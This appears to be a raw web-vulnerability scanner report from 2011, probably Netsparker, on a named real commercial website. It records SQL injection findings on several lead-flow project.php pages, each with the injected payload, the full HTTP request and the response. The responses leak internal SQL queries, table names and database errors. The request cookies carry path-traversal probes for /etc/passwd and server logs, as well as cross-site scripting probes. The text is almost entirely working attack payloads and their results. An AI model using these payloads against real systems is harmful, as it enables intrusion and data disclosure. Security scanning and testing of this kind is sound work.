syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/incn00/project.php

/ppc/leadflow/incn00/project.php

http://www.insideup.com/ppc/leadflow/incn00/project.php?catId='%2B%20convert(int,(CHAR(95)%2BCHAR(33..

Parameters

Parameter Type Value
catId GET '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/incn00/project.php?catId='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qcttka2crouqvm8lqfcj6fn9o7; path=/
Content-Length: 3913
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/incn00/project.php?catId='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)' at line 5
- /ppc/leadflow/fist00/project.php

/ppc/leadflow/fist00/project.php

http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc='%7C%7Ccast((select%20chr(..

Parameters

Parameter Type Value
catId GET 10003
iusrc GET '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

Request

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kamplcfjfl53r422q4kc5hb4k0; path=/
Content-Length: 4013
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&' at line 5
- /ppc/leadflow/weho00/project.php

/ppc/leadflow/weho00/project.php

http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc='%7C%7Ccast((select%20chr(..

Parameters

Parameter Type Value
catId GET 20003
iusrc GET '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

Request

GET /ppc/leadflow/weho00/project.php?catId=20003&iusrc='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 